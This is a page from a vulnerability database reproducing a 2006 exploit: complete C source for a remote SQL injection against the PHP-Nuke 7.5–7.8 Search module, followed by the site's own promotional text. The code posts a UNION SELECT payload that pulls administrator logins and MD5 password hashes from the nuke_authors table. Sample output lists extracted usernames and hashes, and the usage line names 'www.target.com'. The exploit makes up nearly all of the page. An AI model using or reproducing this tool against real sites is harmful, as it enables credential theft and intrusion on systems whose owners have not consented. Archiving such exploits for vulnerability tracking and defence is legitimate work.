Vulners
Lucene search
PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit
/*
____ ____ __
| | | | | | | /
| | | | | |___/ \
| | --- | |----| | \ \
|____| |____ | | |____| __/
Copyright (C) 2006 Untruth Labs
Critical sql injection in phpNuke 7.5-7.8 Exploit
coded by unitedbr
greetz: paulin, barros, xgc
found by Janek Vind "waraxe"
Original advisory: http://www.waraxe.us/advisory-46.html
-------------------------------------------------------------------------------
compiled in VC++
C:\@Pastinha\Area_de_Testes\cpp\phpnuke75to78>cl phpnuke75to78.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.
phpnuke75to78.cpp
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
/out:phpnuke75to78.exe
phpnuke75to78.obj
C:\@Pastinha\Area_de_Testes\cpp\phpnuke75to78>
-------------------------------------------------------------------------------
Exploit:
C:\@Pastinha\Area_de_Testes\cpp\phpnuke75to78>phpnuke75to78 127.0.0.1 /phpnuke75to78/
____ ____ __
| | | | | | | /
| | | | | |___/ \
| | --- | |----| | \ \
|____| |____ | | |____| __/
[~] Sending sql injection...
[~] Connected and exploiting...
[~] Trying to get the md5 passwords...
--[ md5 hash passwords
login: unitedbr
md5 password: 85a2b752c8686ac935765bb8f2c10fe7
login: psy0x
md5 password: 75d690bc3c8598371af11bf1796696f0
login: paulin
md5 password: 2bdfb3cbc500bcc4ea4e6a524487eb4c
login: poerschke
md5 password: 5dab98907b1d8db82172944c52404fcd
login: uNfz
md5 password: 254fa93505554fbfee98d018fd80803a
login: Coloss
md5 password: a89de668ffb6504172a7df7e2abce403
login: skotch
md5 password: 0ef9fb24ae1af6d0a397dc60dc0f87d2
C:\@Pastinha\Area_de_Testes\cpp\phpnuke75to78>
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#define PORT 80
#define BUFLEN 10000
#define DATA "query=p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*" // */ */
#define U " ____ ____ __ \n"
#define L "| | | | | | | / \n"
#define A "| | | | | |___/ \\ \n"
#define B "| | --- | |----| | \\ \\ \n"
#define S "|____| |____ | | |____| __/ \n\n"
void usage(char *argv[]);
void sqlinj(char *host, char *dir);
char *md5pass(char *buffer, char *s, bool test);
int main(int argc, char *argv[])
{
if( argc != 3 )
{
usage(argv);
exit(EXIT_FAILURE);
}
printf(U L A B S);
printf("\n");
printf("[~] Sending sql injection...\n");
sqlinj(argv[1], argv[2]);
return 0;
}
void usage(char *argv[])
{
printf("\n##############################################\n");
printf("# #\n");
printf("# [ Untruth Labs ] #\n");
printf("# #\n");
printf("# presents #\n");
printf("# #\n");
printf("# PHP-Nuke 7.5 to 7.8 sql injection #\n");
printf("# #\n");
printf("# coded by unitedbr #\n");
printf("##############################################\n\n");
printf("Usage:\n"
"%s [target] [dir]\n\n"
"Example:\n"
"%s www.target.com /dir/\n"
"%s www.target.com /\n", argv[0], argv[0], argv[0]);
exit(EXIT_SUCCESS);
}
void sqlinj(char *host, char *dir)
{
char buffer[BUFLEN];
sprintf( buffer, "POST %smodules.php?name=Search HTTP/1.0\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n%s\n\n\n", dir, host, strlen(DATA), DATA);
WSADATA wsaData;
/* Winsock start up */
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
printf("\n[-] Error at WSAStartup()\n");
exit(EXIT_FAILURE);
}
/* Create socket */
SOCKET my_sock;
my_sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if( my_sock == INVALID_SOCKET )
{
printf("\n[-] Error creating socket: %ld\n", WSAGetLastError() );
WSACleanup();
exit(EXIT_FAILURE);
}
struct hostent *he;
struct sockaddr_in addr;
/* getting the ip address */
he = gethostbyname(host);
if( he == NULL )
{
printf("\n[-] Can't resolve ip address \"%s\"\n", host);
exit(EXIT_FAILURE);
}
memset(&addr, 0, sizeof(addr));
memcpy((char*)&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
/* connecting */
if( connect(my_sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
{
printf("\n[-] Can't connect to %s\n", host);
WSACleanup();
exit(EXIT_FAILURE);
}
printf("[~] Connected and exploiting...\n");
if( send(my_sock, buffer, sizeof(buffer), 0) < 0 )
{
printf("\n[-] Can't send socket...\n");
exit(EXIT_FAILURE);
}
memset(buffer,0, sizeof(buffer));
char *s = NULL;
bool test = false, onetime = true;
printf("[~] Trying to get the md5 passwords...\n\n");
while( recv(my_sock, buffer, sizeof(buffer), 0) )
{
while( (s = strstr(buffer, "article&sid=1\"><b>")) != NULL )
{
test = true;
s = md5pass(buffer, s, onetime);
onetime = false;
}
}
if(!test)
printf("Oooopz... Can't find md5 passwords :\\\n");
WSACleanup();
closesocket(my_sock);
}
char *md5pass(char *buffer, char *s, bool onetime)
{
int pos = 0, pos1 = 0, pos2 = 0;
int i = 0, j = 0;
char *str = NULL;
if(onetime)
printf("\n--[ md5 hash passwords\n\n");
if( (s = strstr(buffer, "amp;username=")) != NULL )
{
if( (str = strstr(s, "\">")) != NULL )
{
pos1 = str - s + 1;
}
printf("login: ");
for(i = 13; i < pos1-1; i++)
{
printf("%c", s[i]);
}
printf("\n");
}
if( (s = strstr(buffer, "article&sid=1\"><b>")) != NULL )
{
if( (str = strstr(s, "</b>")) != NULL )
{
pos2 = str - s + 1;
}
printf("md5 password: ");
for(i = 18; i < pos2-1; i++)
{
printf("%c", s[i]);
}
printf("\n\n");
}
//printf("\npos2 = %d\n", pos2);
for(i = 0, j = 260; s[i] != NULL; i++, j++)
{
s[i] = s[j];
}
return s;
}
// milw0rm.com [2006-02-23]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Feb 2006 00:00Current
7.1High risk
Vulners AI Score7.1